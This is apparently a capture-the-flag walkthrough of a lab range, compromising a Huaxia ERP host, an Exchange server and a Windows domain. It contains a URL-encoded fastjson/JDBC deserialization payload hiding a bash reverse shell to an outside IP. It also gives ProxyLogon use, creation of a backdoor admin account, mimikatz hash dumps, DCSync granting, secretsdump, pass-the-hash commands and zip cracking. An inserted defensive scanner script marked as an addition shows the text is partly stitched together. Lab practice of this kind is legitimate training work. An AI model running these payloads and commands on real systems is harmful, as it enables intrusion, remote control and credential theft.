flag1
Scan the external-facing host with fscan.
Port 8000 -> the product's official website (identifies the application as Huaxia ERP).
Reference: Java Code Audit of Huaxia ERP CMS v2.3 (Java 代码审计之华夏 ERP CMS v2.3) | Drunkbaby's Blog
Weak credentials: admin/123456
Hit the JDBC + fastjson (fj) deserialization at /user/list?search=
Stand up a MySQL_Fake_Server on a VPS.
Payload:
/user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%32%34%2e%32%32%32%2e%31%33%36%2e%33%33%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%38%78%4d%7a%4d%33%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d%0a
cat /root/flag/flag01.txt
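Defender's view of this first step: the request to /user/list?search= carries a URL-encoded fastjson object whose decoded form contains an "@type" pointing into com.mysql.jdbc and "autoDeserialize":"true". The scanner below is an added example, not code from the original writeup: it URL-decodes the search parameter of each request line and flags those two indicators. The request lines are constructed samples, and the bare request-line format and the indicator list are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Indicators taken from the decoded payload on this page; extend JDBC_PREFIXES
# if other JDBC drivers should be flagged as well.
JDBC_PREFIXES = ("com.mysql.jdbc.",)
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
AUTODES_RE = re.compile(r'"autoDeserialize"\s*:\s*"?true"?', re.IGNORECASE)

# Constructed sample request lines ("METHOD path protocol"); not real traffic.
SAMPLE_REQUESTS = [
    "GET /user/list?search=%7b%22name%22%3a%22alice%22%7d HTTP/1.1",
    "GET /user/list?search=%7b%22%40type%22%3a%22java.lang.String%22%7d HTTP/1.1",
    "GET /user/list?search=%7b%22%40type%22%3a%22com.mysql.jdbc.JDBC4Connection%22%2c"
    "%22autoDeserialize%22%3a%22true%22%7d HTTP/1.1",
]


def inspect_request(request_line: str) -> list[str]:
    """Return the indicators found in the 'search' parameter of one request line.

    parse_qs strips one layer of URL encoding, which is what the server sees.
    An empty list means nothing suspicious was found in that parameter.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlparse(parts[1]).query
    hits: list[str] = []
    for value in parse_qs(query, keep_blank_values=True).get("search", []):
        # A regex rather than json.loads, so duplicate "@type" keys and
        # truncated JSON are still examined instead of being collapsed or rejected.
        for cls in TYPE_RE.findall(value):
            if cls.startswith(JDBC_PREFIXES):
                hits.append(f"@type={cls}")
        if AUTODES_RE.search(value):
            hits.append("autoDeserialize=true")
    return hits


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan request lines; return (line index, indicators) for every flagged line."""
    return [(i, h) for i, line in enumerate(lines) if (h := inspect_request(line))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS):
        print(f"line {idx}: {', '.join(hits)}")
```

Only one decoding layer is applied, so a double-encoded parameter would need a second pass before the checks.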
flag2
Fetch fscan and frp with wget, scan the internal network, and set up a tunnel.
172.22.3.12   this host (the ERP box)
172.22.3.2    XIAORANG-WIN16   DC
172.22.3.9    XIAORANG-EXC01   Exchange
172.22.3.26   XIAORANG-PC
Exploit ProxyLogon against the Exchange server to obtain SYSTEM.
Create a user, RDP in and grab the flag:
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add
flag3
By default the Exchange machine account holds WriteDACL in the domain, so it can write DCSync rights.
Upload mimikatz and run it as administrator:
privilege::debug
sekurlsa::logonpasswords
The useful entries from the output:
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 63bb769f8b788233f66fc95d25b394cc
* SHA1 : fab946704b39540fa89f56f53cd65e421d933fcc
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :63bb769f8b788233f66fc95d25b394cc -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
This grants DCSync rights (used for domain replication and password-hash extraction) to the Zhangtong account; the target domain is xiaorang.lab and the change is made through the domain controller at 172.22.3.2.
Use Zhangtong to dump the domain admin hash:
proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
Pass-the-hash to the DC (the user name was lost in extraction; <DOMAIN_ADMIN> is a placeholder for the account whose hash was dumped):
proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/<DOMAIN_ADMIN>@172.22.3.2 -codec gbk
flag4
proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/<DOMAIN_ADMIN>@172.22.3.26 -dc-ip 172.22.3.2
Move laterally to .26 with smbclient (<DOMAIN_ADMIN> is a placeholder for the account whose user name was lost in extraction); user Lumia's desktop holds a secret.zip.
The zip contains the flag file.
Use pthexchange to export all mail and attachments from the Lumia mailbox:
import csv

# List that will hold the phone numbers
phone_numbers = []

# Read the CSV file (newline='' is what the csv module expects)
with open('phone lists.csv', 'r', newline='') as file:
    reader = csv.DictReader(file)  # DictReader lets us pull a column by its header name
    for row in reader:
        phone_numbers.append(row['phone'])  # take the value of the phone column

# Print the extracted phone numbers
for phone in phone_numbers:
    print(phone)

# The numbers can also be written to a new file, one per line, for use as a wordlist:
with open('extracted_phones.txt', 'w') as output_file:
    for phone in phone_numbers:
        output_file.write(phone + '\n')
Cracking the archive against that list yields the password 18763918468:
zip2john secret.zip >zip.txt
john --wordlist=extracted_phones.txt zip.txt
Got the flag.
Tags: Exchange, 云镜 (Yunjing range), range practice
Source: https://blog.csdn.net/uuzeray/article/details/141993713